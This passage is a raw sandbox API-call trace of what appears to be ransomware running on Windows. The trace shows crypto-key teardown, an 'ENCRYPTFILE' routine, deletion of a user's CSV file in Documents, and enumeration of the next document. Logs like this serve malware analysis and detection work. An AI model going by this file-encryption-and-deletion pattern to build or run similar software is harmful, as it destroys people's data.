WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0076.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0076.788] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x43ca4a8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0076.788] CryptDestroyKey (hKey=0x41ac000) returned 1 [0076.788] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2590 [0076.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea2e0 [0076.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0076.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0076.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0076.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0076.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0076.789] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.789] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.789] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.789] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0076.789] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0076.789] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.789] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.789] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0076.789] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0076.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2820 [0076.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27c0 [0076.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0076.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0076.789] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796ec8 [0076.789] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x1796ec8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0076.790] CryptReleaseContext (hProv=0x41a5250, dwFlags=0x0) returned 1 [0076.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0076.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea0b8 [0076.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca6a0 [0076.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0076.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0076.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0076.790] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25c0 [0076.790] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.790] FreeLibrary (hLibModule=0x756e0000) returned 1 [0076.790] CloseHandle (hObject=0x258) returned 1 [0076.792] CloseHandle (hObject=0x298) returned 1 [0076.793] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\HD2UssJoRg1BYp.csv", nBufferLength=0x7fff, lpBuffer=0x143f190, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\HD2UssJoRg1BYp.csv", lpFilePart=0x0) returned 0x2c [0076.794] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\HD2UssJoRg1BYp.csv" (normalized: "c:\\users\\fd1hvy\\documents\\hd2ussjorg1byp.csv")) returned 0x20 [0076.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0076.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21a0 [0076.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d28 [0076.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0076.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0076.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0076.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0076.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0076.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0076.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2200 [0076.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x4359ba0 [0076.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d28 | out: hHeap=0x1780000) returned 1 [0076.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8ac8 [0076.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e78 | out: hHeap=0x1780000) returned 1 [0076.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9338 [0076.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359ba0 | out: hHeap=0x1780000) returned 1 [0076.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2200 | out: hHeap=0x1780000) returned 1 [0076.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d70 | out: hHeap=0x1780000) returned 1 [0076.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0076.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8ac8 | out: hHeap=0x1780000) returned 1 [0076.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21d0 | out: hHeap=0x1780000) returned 1 [0076.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0076.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21a0 | out: hHeap=0x1780000) returned 1 [0076.795] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\HD2UssJoRg1BYp.csv", lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b476440, ftCreationTime.dwHighDateTime=0x1d5ec00, ftLastAccessTime.dwLowDateTime=0x6a510e20, ftLastAccessTime.dwHighDateTime=0x1d5ef40, ftLastWriteTime.dwLowDateTime=0x6a510e20, ftLastWriteTime.dwHighDateTime=0x1d5ef40, nFileSizeHigh=0x0, nFileSizeLow=0x6cbd, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="HD2UssJoRg1BYp.csv", cAlternateFileName="HD2USS~1.CSV")) returned 0x41ac500 [0076.795] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\HD2UssJoRg1BYp.csv" (normalized: "c:\\users\\fd1hvy\\documents\\hd2ussjorg1byp.csv")) returned 1 [0076.798] FindNextFileW (in: hFindFile=0x41ac500, lpFindFileData=0x144f1d8 | out: lpFindFileData=0x144f1d8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9b476440, ftCreationTime.dwHighDateTime=0x1d5ec00, ftLastAccessTime.dwLowDateTime=0x6a510e20, ftLastAccessTime.dwHighDateTime=0x1d5ef40, ftLastWriteTime.dwLowDateTime=0x6a510e20, ftLastWriteTime.dwHighDateTime=0x1d5ef40, nFileSizeHigh=0x0, nFileSizeLow=0x6cbd, dwReserved0=0x356310, dwReserved1=0xdf0000, cFileName="HD2UssJoRg1BYp.csv", cAlternateFileName="HD2USS~1.CSV")) returned 0 [0076.798] FindClose (in: hFindFile=0x41ac500 | out: hFindFile=0x41ac500) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9338 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4359860 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2270 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d40 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e30 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf810 | out: hHeap=0x1780000) returned 1 [0076.799] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0076.799] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9218 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9950 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9938 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5e0 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9920 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e21e0 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b22250 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c98f0 | out: hHeap=0x1780000) returned 1 [0076.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf518 | out: hHeap=0x1780000) returned 1 [0076.799] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0076.800] PeekMessageW (in: lpMsg=0x144f78c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f78c) returned 0 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0076.800] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0076.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf590 | out: hHeap=0x1780000) returned 1 [0076.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf658 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2320 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c98f0 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2300 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9920 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2240 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796d88 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2130 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0076.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0076.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9908 [0076.800] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0076.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90f8 | out: hHeap=0x1780000) returned 1 [0076.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9908 | out: hHeap=0x1780000) returned 1 [0076.800] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796d88 | out: hHeap=0x1780000) returned 1 [0076.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2240 | out: hHeap=0x1780000) returned 1 [0076.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0076.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9908 [0076.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf590 [0076.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9938 [0076.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e21d0 [0076.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9950 [0076.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cf8 [0076.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0076.801] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2220 [0076.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0076.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0076.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0076.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e22e0 | out: hHeap=0x1780000) returned 1 [0076.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2220 | out: hHeap=0x1780000) returned 1 [0076.801] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0076.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e22e0 [0076.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0076.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0076.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0076.801] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9bf0 [0076.801] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0076.801] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\Lh2OVLi_4PS_2RxxQd.odp", lpFindFileData=0x144f078 | out: lpFindFileData=0x144f078*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x746906c0, ftCreationTime.dwHighDateTime=0x1d5e1e8, ftLastAccessTime.dwLowDateTime=0xd2e63af0, ftLastAccessTime.dwHighDateTime=0x1d5f102, ftLastWriteTime.dwLowDateTime=0xd2e63af0, ftLastWriteTime.dwHighDateTime=0x1d5f102, nFileSizeHigh=0x0, nFileSizeLow=0x83cc, dwReserved0=0x101adf4, dwReserved1=0x8, cFileName="Lh2OVLi_4PS_2RxxQd.odp", cAlternateFileName="LH2OVL~1.ODP")) returned 0x41ac000 [0076.802] FindClose (in: hFindFile=0x41ac000 | out: hFindFile=0x41ac000) returned 1 [0076.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9bf0 | out: hHeap=0x1780000) returned 1 [0076.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d88 | out: hHeap=0x1780000) returned 1 [0076.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf5b8 | out: hHeap=0x1780000) returned 1 [0076.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21e0 [0076.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0076.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2300 [0076.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b98 [0076.802] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0076.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b98 | out: hHeap=0x1780000) returned 1 [0076.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2300 | out: hHeap=0x1780000) returned 1 [0076.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0076.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2300 [0076.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf770 [0076.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c68 [0076.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2140 [0076.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d70 [0076.802] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2140 | out: hHeap=0x1780000) returned 1 [0076.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9e78 [0076.802] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf608 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2220 [0076.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9c50 | out: hHeap=0x1780000) returned 1 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf810 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c50 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9da0 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0076.803] PeekMessageW (in: lpMsg=0x144f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f114) returned 0 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9c80 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2140 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2200 [0076.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9d58 | out: hHeap=0x1780000) returned 1 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f18 [0076.803] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0076.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f18 | out: hHeap=0x1780000) returned 1 [0076.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf428 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2150 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf518 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d88 [0076.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2230 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e18 [0076.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2230 | out: hHeap=0x1780000) returned 1 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2270 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d40 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2160 [0076.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2160 | out: hHeap=0x1780000) returned 1 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2160 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9dd0 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2180 [0076.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2180 | out: hHeap=0x1780000) returned 1 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43c9d28 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5b8 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9ba8 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2230 [0076.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9ba8 | out: hHeap=0x1780000) returned 1 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf5e0 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9d58 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9de8 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2240 [0076.804] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9e00 | out: hHeap=0x1780000) returned 1 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e00 [0076.804] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e30 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2180 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9e60 [0076.805] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e21a0 [0076.805] 